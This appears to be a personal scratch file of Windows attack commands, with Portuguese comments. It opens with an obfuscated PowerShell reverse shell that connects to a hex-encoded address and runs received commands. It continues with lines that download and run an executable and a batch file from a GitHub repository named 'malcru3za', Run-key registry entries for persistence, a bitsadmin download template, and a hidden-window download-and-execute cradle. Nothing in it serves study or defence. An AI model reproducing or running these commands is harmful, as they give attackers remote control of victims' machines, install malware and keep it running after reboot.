while ($true) {$px = "12","12","12","12";$p = ($px | ForEach {[convert]::ToInt32($_,16) }) -join '.';$w = "GET /index.html HTTP/1.1`r`nHost: $p`r`nMozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0`r`nAccept: text/html`r`n`r`n";$s = [System.Text.ASCIIEncoding];[byte[]]$b = 0..65535|%{0};$x = "n-eiorvsxpk5";Set-alias $x ($x[$true-10] + ($x[[byte]("0x" + "FF") - 265]) + $x[[byte]("0x" + "9a") - 158]);$y = New-Object System.Net.Sockets.TCPClient($p,443);$z = $y.GetStream();$d = $s::UTF8.GetBytes($w);$z.Write($d, 0, $d.Length);$t = (n-eiorvsxpk5 whoami) + "$ ";while(($l = $z.Read($b, 0, $b.Length)) -ne 0){;$v = (New-Object -TypeName $s).GetString($b,0, $l);$d = $s::UTF8.GetBytes((n-eiorvsxpk5 $v 2>&1 | Out-String )) + $s::UTF8.GetBytes($t);$z.Write($d, 0, $d.Length);}$y.Close();Start-Sleep -Seconds 5} 

echo off
cmd.exe /c powershell.exe wget https://github.com/cru3za/coisas/blob/master/PowerShdll/malcru3za.exe?raw=true -o c:\\windows\\temp\\System.exe;powershell.exe wget https://raw.githubusercontent.com/cru3za/coisas/master/PowerShdll/cru3za.txt -o c:\\windows\\temp\\System.bat;c:\\windows\\temp\\System.bat
exit

//Download
powershell.exe wget https://github.com/cru3za/coisas/blob/master/Powershdll.rar -o C:\windows\temp\Powershdll.rar

//Download cmd
bitsadmin /transfer mydownloadjob  /download /priority normal URL LOCALE

//persistencia
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v PowerShdll /t REG_SZ /d "C:\Windows\Temp\PowerShdll.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Calc_v2 /t REG_SZ /d "C:\Users\Cru3za\Desktop\cru3za\c++\Calc_v2.exe /MININIZED"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v firefox /t REG_SZ /d "C:\Program Files\Mozilla Firefox\firefox.exe /MININIZED"
C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize


set path=C:\Program Files\WinRAR
cd \windows\temp
unrar e powershdll.rar

pOWerSHell -wIndOwStYLE HiDDEn ieX (New-Object Net.WebClient).DownloadString('link');

pornonovinhas.com
